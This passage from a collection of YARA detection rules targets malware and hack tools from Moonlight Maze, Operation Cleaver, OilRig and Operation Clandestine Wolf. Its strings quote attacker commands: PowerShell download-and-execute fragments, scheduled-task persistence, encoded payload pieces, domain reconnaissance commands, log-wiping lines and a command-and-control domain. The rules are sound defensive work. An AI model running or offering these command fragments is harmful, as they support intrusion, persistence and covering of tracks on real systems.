    ((any of ($a*)))
}

rule loki2crypto {
  meta:
    author = "Costin Raiu, Kaspersky Lab"
    date = "2017-03-21"
    version = "1.0"
    description = "Rule to detect hardcoded DH modulus used in 1996/1997 Loki2 sourcecode; #ifdef STRONG_CRYPTO /* 384-bit strong prime */"
    reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
    hash = "19fbd8cbfb12482e8020a887d6427315"
    hash = "ea06b213d5924de65407e8931b1e4326"
    hash = "14ecd5e6fc8e501037b54ca263896a11"
    hash = "e079ec947d3d4dacb21e993b760a65dc"
    hash = "edf900cebb70c6d1fcab0234062bfc28"
  strings:
    $modulus = { DA E1 01 CD D8 C9 70 AF C2 E4 F2 7A 41 8B 43 39 52 9B 4B 4D E5 85 F8 49 }
  condition:
    (any of them)
}

rule apt_RU_MoonlightMaze_de_tool {
  meta:
    author = "Kaspersky Lab"
    date = "2017-03-27"
    version = "1.0"
    last_modified = "2017-03-27"
    reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
    description = "Rule to detect Moonlight Maze 'de' and 'deg' tunnel tool"
    hash = "4bc7ed168fb78f0dc688ee2be20c9703"
    hash = "8b56e8552a74133da4bc5939b5f74243"
  strings:
    $a1 = "Vnuk: %d" ascii fullword
    $a2 = "Syn: %d" ascii fullword
    $a3 = { 25 73 0A 25 73 0A 25 73 0A 25 73 0A }
  condition:
    ((2 of ($a*)))
}

rule apt_RU_MoonlightMaze_cle_tool {
  meta:
    author = "Kaspersky Lab"
    date = "2017-03-27"
    version = "1.0"
    last_modified = "2017-03-27"
    reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
    description = "Rule to detect Moonlight Maze 'cle' log cleaning tool"
    hash = "647d7b711f7b4434145ea30d0ef207b0"
  strings:
    $a1 = "./a filename template_file" ascii wide
    $a2 = "May be %s is empty?" ascii wide
    $a3 = "template string = |%s|" ascii wide
    $a4 = "No blocks !!!"
    $a5 = "No data in this block !!!!!!" ascii wide
    $a6 = "No good line"
  condition:
    ((3 of ($a*)))
}

rule apt_RU_MoonlightMaze_xk_keylogger {
  meta:
    author = "Kaspersky Lab"
    date = "2017-03-27"
    version = "1.0"
    last_modified = "2017-03-27"
    reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
    description = "Rule to detect Moonlight Maze 'xk' keylogger"
  strings:
    $a1 = "Log ended at => %s"
    $a2 = "Log started at => %s [pid %d]"
    $a3 = "/var/tmp/task" fullword
    $a4 = "/var/tmp/taskhost" fullword
    $a5 = "my hostname: %s"
    $a6 = "/var/tmp/tasklog"
    $a7 = "/var/tmp/.Xtmp01" fullword
    $a8 = "myfilename=-%s-"
    $a9 = "/var/tmp/taskpid"
    $a10 = "mypid=-%d-" fullword
    $a11 = "/var/tmp/taskgid" fullword
    $a12 = "mygid=-%d-" fullword
  condition:
    ((3 of ($a*)))
}

rule apt_RU_MoonlightMaze_encrypted_keylog {
  meta:
    author = "Kaspersky Lab"
    date = "2017-03-27"
    version = "1.0"
    last_modified = "2017-03-27"
    reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
    description = "Rule to detect Moonlight Maze encrypted keylogger logs"
  strings:
    $a1 = { 47 01 22 2A 6D 3E 39 2C }
  condition:
    ($a1 at 0)
}

rule apt_RU_MoonlightMaze_IRIX_exploit_GEN {
  meta:
    author = "Kaspersky Lab"
    date = "2017-03-27"
    version = "1.0"
    last_modified = "2017-03-27"
    reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
    description = "Rule to detect Irix exploits from David Hedley used by Moonlight Maze hackers"
    reference2 = "https://www.exploit-db.com/exploits/19274/"
    hash = "008ea82f31f585622353bd47fa1d84be"
    hash = "a26bad2b79075f454c83203fa00ed50c"
    hash = "f67fc6e90f05ba13f207c7fdaa8c2cab"
    hash = "5937db3896cdd8b0beb3df44e509e136"
    hash = "f4ed5170dcea7e5ba62537d84392b280"
  strings:
    $a1 = "stack = 0x%x, targ_addr = 0x%x"
    $a2 = "execl failed"
  condition:
    (uint32(0) == 1179403647) and (all of them)
}

rule apt_RU_MoonlightMaze_u_logcleaner {
  meta:
    author = "Kaspersky Lab"
    date = "2017-03-27"
    version = "1.0"
    last_modified = "2017-03-27"
    reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
    description = "Rule to detect log cleaners based on utclean.c"
    reference2 = "http://cd.textfiles.com/cuteskunk/Unix-Hacking-Exploits/utclean.c"
    hash = "d98796dcda1443a37b124dbdc041fe3b"
    hash = "73a518f0a73ab77033121d4191172820"
  strings:
    $a1 = "Hiding complit...n"
    $a2 = "usage: %s <username> <fixthings> [hostname]"
    $a3 = "ls -la %s* ; /bin/cp  ./wtmp.tmp %s; rm  ./wtmp.tmp"
  condition:
    (uint32(0) == 1179403647) and (any of them)
}

rule apt_RU_MoonlightMaze_wipe {
  meta:
    author = "Kaspersky Lab"
    date = "2017-03-27"
    version = "1.0"
    last_modified = "2017-03-27"
    reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
    description = "Rule to detect log cleaner based on wipe.c"
    reference2 = "http://www.afn.org/~afn28925/wipe.c"
    hash = "e69efc504934551c6a77b525d5343241"
  strings:
    $a1 = "ERROR: Unlinking tmp WTMP file."
    $a2 = "USAGE: wipe [ u|w|l|a ] ...options..."
    $a3 = "Erase acct entries on tty :   wipe a [username] [tty]"
    $a4 = "Alter lastlog entry       :   wipe l [username] [tty] [time] [host]"
  condition:
    (uint32(0) == 1179403647) and (2 of them)
}

rule APT_NGO_wuaclt {
  meta:
    author = "AlienVault Labs"
  strings:
    $a = "%%APPDATA%%\\Microsoft\\wuauclt\\wuauclt.dat"
    $b = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    $c = "/news/show.asp?id%d=%d"
    $d = "%%APPDATA%%\\Microsoft\\wuauclt\\"
    $e = "0l23kj@nboxu"
    $f = "%%s.asp?id=%%d&Sid=%%d"
    $g = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SP Q%%d)"
    $h = "Cookies: UseID=KGIOODAOOK%%s"
  condition:
    ($a and $b and $c) or ($d and $e) or ($f and $g and $h)
}

rule APT_NGO_wuaclt_PDF {
  meta:
    author = "AlienVault Labs"
  strings:
    $pdf = "%PDF" nocase
    $comment = { 3C 21 2D 2D 0D 0A 63 57 4B 51 6D 5A 6C 61 56 56 56 56 56 56 56 56 56 56 56 56 56 63 77 53 64 63 6A 4B 7A 38 35 6D 37 4A 56 6D 37 4A 46 78 6B 5A 6D 5A 6D 52 44 63 5A 58 41 73 6D 5A 6D 5A 7A 42 4A 31 79 73 2F 4F 0D 0A }
  condition:
    $pdf at 0 and $comment in (0..200)
}

rule ZhoupinExploitCrew {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "zhoupin exploit crew" nocase
    $s2 = "zhopin exploit crew" nocase
  condition:
    1 of them
}

rule BackDoorLogger {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "BackDoorLogger"
    $s2 = "zhuAddress"
  condition:
    all of them
}

rule Jasus {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "pcap_dump_open"
    $s2 = "Resolving IPs to poison..."
    $s3 = "WARNNING: Gateway IP can not be found"
  condition:
    all of them
}

rule LoggerModule {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "%s-%02d%02d%02d%02d%02d.r"
    $s2 = "C:\\Users\\%s\\AppData\\Cookies\\"
  condition:
    all of them
}

rule NetC {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "NetC.exe" wide
    $s2 = "Net Service"
  condition:
    all of them
}

rule ShellCreator2 {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "ShellCreator2.Properties"
    $s2 = "set_IV"
  condition:
    all of them
}

rule SmartCopy2 {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "SmartCopy2.Properties"
    $s2 = "ZhuFrameWork"
  condition:
    all of them
}

rule SynFlooder {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "Unable to resolve [ %s ]. ErrorCode %d"
    $s2 = "your target's IP is : %s"
    $s3 = "Raw TCP Socket Created successfully."
  condition:
    all of them
}

rule TinyZBot {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "NetScp" wide
    $s2 = "TinyZBot.Properties.Resources.resources"
    $s3 = "Aoao WaterMark"
    $s4 = "Run_a_exe"
    $s5 = "netscp.exe"
    $s6 = "get_MainModule_WebReference_DefaultWS"
    $s7 = "remove_CheckFileMD5Completed"
    $s8 = "http://tempuri.org/"
    $s9 = "Zhoupin_Cleaver"
  condition:
    ($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or ($s9)
}

rule antivirusdetector {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "getShadyProcess"
    $s2 = "getSystemAntiviruses"
    $s3 = "AntiVirusDetector"
  condition:
    all of them
}

rule csext {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "COM+ System Extentions"
    $s2 = "csext.exe"
    $s3 = "COM_Extentions_bin"
  condition:
    all of them
}

rule kagent {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "kill command is in last machine, going back"
    $s2 = "message data length in B64: %d Bytes"
  condition:
    all of them
}

rule mimikatzWrapper : Toolkit {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "mimikatzWrapper"
    $s2 = "get_mimikatz"
  condition:
    all of them
}

rule pvz_in {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "LAST_TIME=00/00/0000:00:00PM$"
    $s2 = "if %%ERRORLEVEL%% == 1 GOTO line"
  condition:
    all of them
}

rule pvz_out {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "Network Connectivity Module" wide
    $s2 = "OSPPSVC" wide
  condition:
    all of them
}

rule wndTest {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "[Alt]" wide
    $s2 = "<< %s >>:" wide
    $s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;"
  condition:
    all of them
}

rule zhCat {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "zhCat -l -h -tp 1234"
    $s2 = "ABC ( A Big Company )" wide
  condition:
    all of them
}

rule zhLookUp {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "zhLookUp.Properties"
  condition:
    all of them
}

rule zhmimikatz {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "MimikatzRunner"
    $s2 = "zhmimikatz"
  condition:
    all of them
}

rule Zh0uSh311 {
  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"
  strings:
    $s1 = "Zh0uSh311"
  condition:
    all of them
}

rule OPCLEAVER_BackDoorLogger {
  meta:
    description = "Keylogger used by attackers in Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "BackDoorLogger"
    $s2 = "zhuAddress"
  condition:
    all of them
}

rule OPCLEAVER_Jasus {
  meta:
    description = "ARP cache poisoner used by attackers in Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "pcap_dump_open"
    $s2 = "Resolving IPs to poison..."
    $s3 = "WARNNING: Gateway IP can not be found"
  condition:
    all of them
}

rule OPCLEAVER_LoggerModule {
  meta:
    description = "Keylogger used by attackers in Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "%s-%02d%02d%02d%02d%02d.r"
    $s2 = "C:\\Users\\%s\\AppData\\Cookies\\"
  condition:
    all of them
}

rule OPCLEAVER_NetC {
  meta:
    description = "Net Crawler used by attackers in Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "NetC.exe" wide
    $s2 = "Net Service"
  condition:
    all of them
}

rule OPCLEAVER_ShellCreator2 {
  meta:
    description = "Shell Creator used by attackers in Operation Cleaver to create ASPX web shells"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "ShellCreator2.Properties"
    $s2 = "set_IV"
  condition:
    all of them
}

rule OPCLEAVER_SmartCopy2 {
  meta:
    description = "Malware or hack tool used by attackers in Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "SmartCopy2.Properties"
    $s2 = "ZhuFrameWork"
  condition:
    all of them
}

rule OPCLEAVER_SynFlooder {
  meta:
    description = "Malware or hack tool used by attackers in Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "Unable to resolve [ %s ]. ErrorCode %d"
    $s2 = "your target’s IP is : %s"
    $s3 = "Raw TCP Socket Created successfully."
  condition:
    all of them
}

rule OPCLEAVER_TinyZBot {
  meta:
    description = "Tiny Bot used by attackers in Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "NetScp" wide
    $s2 = "TinyZBot.Properties.Resources.resources"
    $s3 = "Aoao WaterMark"
    $s4 = "Run_a_exe"
    $s5 = "netscp.exe"
    $s6 = "get_MainModule_WebReference_DefaultWS"
    $s7 = "remove_CheckFileMD5Completed"
    $s8 = "http://tempuri.org/"
    $s9 = "Zhoupin_Cleaver"
  condition:
    (($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or $s9)
}

rule OPCLEAVER_ZhoupinExploitCrew {
  meta:
    description = "Keywords used by attackers in Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "zhoupin exploit crew" nocase
    $s2 = "zhopin exploit crew" nocase
  condition:
    1 of them
}

rule OPCLEAVER_antivirusdetector {
  meta:
    description = "Hack tool used by attackers in Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "getShadyProcess"
    $s2 = "getSystemAntiviruses"
    $s3 = "AntiVirusDetector"
  condition:
    all of them
}

rule OPCLEAVER_csext {
  meta:
    description = "Backdoor used by attackers in Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "COM+ System Extentions"
    $s2 = "csext.exe"
    $s3 = "COM_Extentions_bin"
  condition:
    all of them
}

rule OPCLEAVER_kagent {
  meta:
    description = "Backdoor used by attackers in Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "kill command is in last machine, going back"
    $s2 = "message data length in B64: %d Bytes"
  condition:
    all of them
}

rule OPCLEAVER_mimikatzWrapper {
  meta:
    description = "Mimikatz Wrapper used by attackers in Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "mimikatzWrapper"
    $s2 = "get_mimikatz"
  condition:
    all of them
}

rule OPCLEAVER_pvz_in {
  meta:
    description = "Parviz tool used by attackers in Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "LAST_TIME=00/00/0000:00:00PM$"
    $s2 = "if %%ERRORLEVEL%% == 1 GOTO line"
  condition:
    all of them
}

rule OPCLEAVER_pvz_out {
  meta:
    description = "Parviz tool used by attackers in Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "Network Connectivity Module" wide
    $s2 = "OSPPSVC" wide
  condition:
    all of them
}

rule OPCLEAVER_wndTest {
  meta:
    description = "Backdoor used by attackers in Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "[Alt]" wide
    $s2 = "<< %s >>:" wide
    $s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;"
  condition:
    all of them
}

rule OPCLEAVER_zhCat {
  meta:
    description = "Network tool used by Iranian hackers and used by attackers in Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "Mozilla/4.0 ( compatible; MSIE 7.0; AOL 8.0 )" ascii fullword
    $s2 = "ABC ( A Big Company )" wide fullword
  condition:
    all of them
}

rule OPCLEAVER_zhLookUp {
  meta:
    description = "Hack tool used by attackers in Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "zhLookUp.Properties"
  condition:
    all of them
}

rule OPCLEAVER_zhmimikatz {
  meta:
    description = "Mimikatz wrapper used by attackers in Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Cylance Inc."
    score = "70"
  strings:
    $s1 = "MimikatzRunner"
    $s2 = "zhmimikatz"
  condition:
    all of them
}

rule OPCLEAVER_Parviz_Developer {
  meta:
    description = "Parviz developer known from Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Florian Roth"
    score = "70"
  strings:
    $s1 = "Users\\parviz\\documents\\" nocase
  condition:
    $s1
}

rule OPCLEAVER_CCProxy_Config {
  meta:
    description = "CCProxy config known from Operation Cleaver"
    reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
    date = "2014/12/02"
    author = "Florian Roth"
    score = "70"
  strings:
    $s1 = "UserName=User-001" ascii fullword
    $s2 = "Web=1" ascii fullword
    $s3 = "Mail=1" ascii fullword
    $s4 = "FTP=0" ascii fullword
    $x1 = "IPAddressLow=78.109.194.114" ascii fullword
  condition:
    all of ($s*) or $x1
}

rule OilRig_Malware_Campaign_Gen1 {
  meta:
    description = "Detects malware from OilRig Campaign"
    author = "Florian Roth"
    reference = "https://goo.gl/QMRZ8K"
    date = "2016-10-12"
    hash1 = "d808f3109822c185f1d8e1bf7ef7781c219dc56f5906478651748f0ace489d34"
    hash2 = "80161dad1603b9a7c4a92a07b5c8bce214cf7a3df897b561732f9df7920ecb3e"
    hash3 = "662c53e69b66d62a4822e666031fd441bbdfa741e20d4511c6741ec3cb02475f"
    hash4 = "903b6d948c16dc92b69fe1de76cf64ab8377893770bf47c29bf91f3fd987f996"
    hash5 = "c4fbc723981fc94884f0f493cb8711fdc9da698980081d9b7c139fcffbe723da"
    hash6 = "57efb7596e6d9fd019b4dc4587ba33a40ab0ca09e14281d85716a253c5612ef4"
    hash7 = "1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1"
    hash8 = "9f31a1908afb23a1029c079ee9ba8bdf0f4c815addbe8eac85b4163e02b5e777"
    hash9 = "0cd9857a3f626f8e0c07495a4799c59d502c4f3970642a76882e3ed68b790f8e"
    hash10 = "4b5112f0fb64825b879b01d686e8f4d43521252a3b4f4026c9d1d76d3f15b281"
    hash11 = "4e5b85ea68bf8f2306b6b931810ae38c8dff3679d78da1af2c91032c36380353"
    hash12 = "c3c17383f43184a29f49f166a92453a34be18e51935ddbf09576a60441440e51"
    hash13 = "f3856c7af3c9f84101f41a82e36fc81dfc18a8e9b424a3658b6ba7e3c99f54f2"
    hash14 = "0c64ab9b0c122b1903e8063e3c2c357cbbee99de07dc535e6c830a0472a71f39"
    hash15 = "d874f513a032ccb6a5e4f0cd55862b024ea0bee4de94ccf950b3dd894066065d"
    hash16 = "8ee628d46b8af20c4ba70a2fe8e2d4edca1980583171b71fe72455c6a52d15a9"
    hash17 = "55d0e12439b20dadb5868766a5200cbbe1a06053bf9e229cf6a852bfcf57d579"
    hash18 = "528d432952ef879496542bc62a5a4b6eee788f60f220426bd7f933fa2c58dc6b"
    hash19 = "93940b5e764f2f4a2d893bebef4bf1f7d63c4db856877020a5852a6647cb04a0"
    hash20 = "e2ec7fa60e654f5861e09bbe59d14d0973bd5727b83a2a03f1cecf1466dd87aa"
    hash21 = "9c0a33a5dc62933f17506f20e0258f877947bdcd15b091a597eac05d299b7471"
    hash22 = "a787c0e42608f9a69f718f6dca5556607be45ec77d17b07eb9ea1e0f7bb2e064"
    hash23 = "3772d473a2fe950959e1fd56c9a44ec48928f92522246f75f4b8cb134f4713ff"
    hash24 = "3986d54b00647b507b2afd708b7a1ce4c37027fb77d67c6bc3c20c3ac1a88ca4"
    hash25 = "f5a64de9087b138608ccf036b067d91a47302259269fb05b3349964ca4060e7e"
  strings:
    $x1 = "Get-Content $env:Public\\Libraries\\update.vbs) -replace" ascii
    $x2 = "wss.Run \"powershell.exe \" & Chr(34) & \"& {waitfor haha /T 2}\" & Chr(34), 0" ascii fullword
    $x3 = "Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")" ascii fullword
    $s4 = "CreateObject(\"WScript.Shell\").Run cmd, 0o" ascii fullword
    $b1 = "JGdsb2JhbDpteWhvc3QgP" ascii
    $b2 = "SE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzX" ascii
    $b3 = "U2V0IHdzcyA9IENyZWF0ZU9iamVjdCgid1NjcmlwdC5TaGV" ascii
    $b4 = "JHNjcmlwdGRpciA9IFNwbGl0LVBhdGggLVBhcmVudCAtUGF0aCA" ascii
    $b5 = "DQpTZXQgd3NzID0gQ3JlYXRlT2JqZWN" ascii
    $b6 = "d2hvYW1pICYgaG9zdG5hb" ascii
  condition:
    (uint16(0) == 53200 and filesize < 716800 and 1 of them)
}

rule OilRig_Malware_Campaign_Mal1 {
  meta:
    description = "Detects malware from OilRig Campaign"
    author = "Florian Roth"
    reference = "https://goo.gl/QMRZ8K"
    date = "2016-10-12"
    hash1 = "e17e1978563dc10b73fd54e7727cbbe95cc0b170a4e7bd0ab223e059f6c25fcc"
  strings:
    $x1 = "DownloadExecute=\"powershell \"\"&{$r=Get-Random;$wc=(new-object System.Net.WebClient);$wc.DownloadFile(" ascii
    $x2 = "-ExecutionPolicy Bypass -File \"&HOME&\"dns.ps1\"" ascii fullword
    $x3 = "CreateObject(\"WScript.Shell\").Run Replace(DownloadExecute,\"-_\",\"bat\")" ascii fullword
    $x4 = "CreateObject(\"WScript.Shell\").Run DnsCmd,0" ascii fullword
    $s1 = "http://winodwsupdates.me" ascii
  condition:
    (uint16(0) == 20296 and filesize < 4096 and 1 of them) or (2 of them)
}

rule OilRig_Malware_Campaign_Gen2 {
  meta:
    description = "Detects malware from OilRig Campaign"
    author = "Florian Roth"
    reference = "https://goo.gl/QMRZ8K"
    date = "2016-10-12"
    hash1 = "c6437f57a8f290b5ec46b0933bfa8a328b0cb2c0c7fbeea7f21b770ce0250d3d"
    hash2 = "293522e83aeebf185e653ac279bba202024cedb07abc94683930b74df51ce5cb"
  strings:
    $s1 = "%userprofile%\\AppData\\Local\\Microsoft\\ " ascii fullword
    $s2 = "$fdn=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('" ascii fullword
    $s3 = "&{$rn = Get-Random; $id = 'TR" ascii fullword
    $s4 = "') -replace '__',('DNS'+$id) | " ascii fullword
    $s5 = "\\upd.vbs" ascii fullword
    $s6 = "schtasks /create /F /sc minute /mo " ascii fullword
    $s7 = "') -replace '__',('HTP'+$id) | " ascii fullword
    $s8 = "&{$rn = Get-Random -minimum 1 -maximum 10000; $id = 'AZ" ascii fullword
    $s9 = "http://www.israirairlines.com/?mode=page&page=14635&lang=eng<" ascii fullword
  condition:
    (uint16(0) == 53200 and filesize < 4096000 and 2 of ($s*)) or (4 of them)
}

rule OilRig_Malware_Campaign_Gen3 {
  meta:
    description = "Detects malware from OilRig Campaign"
    author = "Florian Roth"
    reference = "https://goo.gl/QMRZ8K"
    date = "2016-10-12"
    hash1 = "5e9ddb25bde3719c392d08c13a295db418d7accd25d82d020b425052e7ba6dc9"
    hash2 = "bd0920c8836541f58e0778b4b64527e5a5f2084405f73ee33110f7bc189da7a9"
    hash3 = "90639c7423a329e304087428a01662cc06e2e9153299e37b1b1c90f6d0a195ed"
  strings:
    $x1 = "source code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr" ascii fullword
    $x2 = "\\Libraries\\fireueye.vbs" ascii fullword
    $x3 = "\\Libraries\\fireeye.vbs&" wide fullword
  condition:
    (uint16(0) == 53200 and filesize < 102400 and 1 of them)
}

rule OilRig_Malware_Campaign_Mal2 {
  meta:
    description = "Detects malware from OilRig Campaign"
    author = "Florian Roth"
    reference = "https://goo.gl/QMRZ8K"
    date = "2016-10-12"
    hash1 = "65920eaea00764a245acb58a3565941477b78a7bcc9efaec5bf811573084b6cf"
  strings:
    $x1 = "wss.Run \"powershell.exe \" & Chr(34) & \"& {(Get-Content $env:Public\\Libraries\\update.vbs) -replace '__',(Get-Random) | Set-C" ascii
    $x2 = "Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")" ascii fullword
    $x3 = "mailto:Mohammed.sarah@gratner.com" wide fullword
    $x4 = "mailto:Tarik.Imam@gartner.com" wide fullword
    $x5 = "Call Extract(DnsPs1, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\dns.ps1\")" ascii fullword
    $x6 = "2dy53My5vcmcvMjAw" wide fullword
  condition:
    (uint16(0) == 53200 and filesize < 204800 and 1 of them)
}

rule OilRig_Campaign_Reconnaissance {
  meta:
    description = "Detects Windows discovery commands - known from OilRig Campaign"
    author = "Florian Roth"
    reference = "https://goo.gl/QMRZ8K"
    date = "2016-10-12"
    hash1 = "5893eae26df8e15c1e0fa763bf88a1ae79484cdb488ba2fc382700ff2cfab80c"
  strings:
    $s1 = "whoami & hostname & ipconfig /all" ascii
    $s2 = "net user /domain 2>&1 & net group /domain 2>&1" ascii
    $s3 = "net group \"domain admins\" /domain 2>&1 & " ascii
  condition:
    (filesize < 1024 and 1 of them)
}

rule OilRig_Malware_Campaign_Mal3 {
  meta:
    description = "Detects malware from OilRig Campaign"
    author = "Florian Roth"
    reference = "https://goo.gl/QMRZ8K"
    date = "2016-10-12"
    hash1 = "02226181f27dbf59af5377e39cf583db15200100eea712fcb6f55c0a2245a378"
  strings:
    $x1 = "(Get-Content $env:Public\\Libraries\\dns.ps1) -replace ('#'+'##'),$botid | Set-Content $env:Public\\Libraries\\dns.ps1" ascii fullword
    $x2 = "Invoke-Expression ($global:myhome+'tp\\'+$global:filename+'.bat > '+$global:myhome+'tp\\'+$global:filename+'.txt')" ascii fullword
    $x3 = "('00000000'+(convertTo-Base36(Get-Random -Maximum 46655)))" ascii fullword
  condition:
    (filesize < 10240 and 1 of them)
}

rule OpClandestineWolf {
  meta:
    alert_severity = "HIGH"
    log = "false"
    author = "NDF"
    weight = 10
    alert = true
    source = " https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html"
    version = 1
    date = "2015-06-23"
    description = "Operation Clandestine Wolf signature based on OSINT from 06.23.15"
    hash0 = "1a4b710621ef2e69b1f7790ae9b7a288"
    hash1 = "917c92e8662faf96fffb8ffe7b7c80fb"
    hash2 = "975b458cb80395fa32c9dda759cb3f7b"
    hash3 = "3ed34de8609cd274e49bbd795f21acc4"
    hash4 = "b1a55ec420dd6d24ff9e762c7b753868"
    hash5 = "afd753a42036000ad476dcd81b56b754"
